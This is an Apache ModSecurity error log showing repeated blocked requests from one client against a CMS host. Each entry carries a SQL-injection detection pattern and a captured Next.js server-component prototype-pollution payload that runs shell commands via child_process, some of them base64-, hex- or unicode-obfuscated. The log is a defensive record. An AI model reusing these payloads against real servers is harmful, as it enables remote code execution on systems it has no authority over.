"(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/dashboard"] [unique_id "adJmzrxQSOrq_iRTM7dqLQAAARI"] [Sun Apr 05 15:42:38.873650 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:45308] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/checkout"] [unique_id "adJmzrxQSOrq_iRTM7dqLAAAAQU"] [Sun Apr 05 15:42:38.873985 2026] [:error] [pid 31198:tid 31254] [client 172.94.9.253:45278] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/search"] [unique_id "adJmzjT5TgrBR8xRnfXBBQAAAUI"] [Sun Apr 05 15:42:38.874858 2026] [:error] [pid 23077:tid 23094] [client 172.94.9.253:45324] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/cart"] [unique_id "adJmzpc83uMXRUE9zvQTLgAAAcs"] [Sun Apr 05 15:42:38.886592 2026] [:error] [pid 23077:tid 23105] [client 172.94.9.253:45336] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/admin"] [unique_id "adJmzpc83uMXRUE9zvQTMAAAAdY"] [Sun Apr 05 15:42:38.886726 2026] [:error] [pid 13019:tid 13253] [client 172.94.9.253:45346] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signin"] [unique_id "adJmzrxQSOrq_iRTM7dqMQAAAQ0"] [Sun Apr 05 15:42:38.887243 2026] [:error] [pid 13019:tid 13243] [client 172.94.9.253:45348] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/login"] [unique_id "adJmzrxQSOrq_iRTM7dqMgAAAQM"] [Sun Apr 05 15:42:38.887369 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:45380] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/session"] [unique_id "adJmzrxQSOrq_iRTM7dqMwAAAQY"] [Sun Apr 05 15:42:38.888865 2026] [:error] [pid 23077:tid 23096] [client 172.94.9.253:45378] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/session"] [unique_id "adJmzpc83uMXRUE9zvQTMQAAAc0"] [Sun Apr 05 15:42:38.917627 2026] [:error] [pid 22788:tid 22798] [client 172.94.9.253:45330] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/register"] [unique_id "adJmziLbhFL16Wsx-C9DCwAAAYg"] [Sun Apr 05 15:42:39.006527 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:45410] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/session"] [unique_id "adJmz7xQSOrq_iRTM7dqNQAAAQU"] [Sun Apr 05 15:42:39.006966 2026] [:error] [pid 13019:tid 13253] [client 172.94.9.253:45416] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/session"] [unique_id "adJmz7xQSOrq_iRTM7dqNgAAAQ0"] [Sun Apr 05 15:42:39.009153 2026] [:error] [pid 23077:tid 23086] [client 172.94.9.253:45392] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/users"] [unique_id "adJmz5c83uMXRUE9zvQTMwAAAcM"] [Sun Apr 05 15:42:39.012403 2026] [:error] [pid 23077:tid 23093] [client 172.94.9.253:45474] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/app"] [unique_id "adJmz5c83uMXRUE9zvQTNQAAAco"] [Sun Apr 05 15:42:39.012750 2026] [:error] [pid 13019:tid 13262] [client 172.94.9.253:45458] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth"] [unique_id "adJmz7xQSOrq_iRTM7dqOAAAARY"] [Sun Apr 05 15:42:39.014403 2026] [:error] [pid 1503:tid 1522] [client 172.94.9.253:45402] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/es"] [unique_id "adJmz0I7AjfUQYCN-J7DvwAAAM0"] [Sun Apr 05 15:42:39.027164 2026] [:error] [pid 23077:tid 23103] [client 172.94.9.253:45434] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/es"] [unique_id "adJmz5c83uMXRUE9zvQTNAAAAdQ"] [Sun Apr 05 15:42:39.058688 2026] [:error] [pid 23077:tid 23090] [client 172.94.9.253:45444] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/signup"] [unique_id "adJmz5c83uMXRUE9zvQTMgAAAcc"] [Sun Apr 05 15:42:39.059729 2026] [:error] [pid 13019:tid 13243] [client 172.94.9.253:45420] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/signin"] [unique_id "adJmz7xQSOrq_iRTM7dqNwAAAQM"] [Sun Apr 05 15:42:39.094552 2026] [:error] [pid 23077:tid 23105] [client 172.94.9.253:45496] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 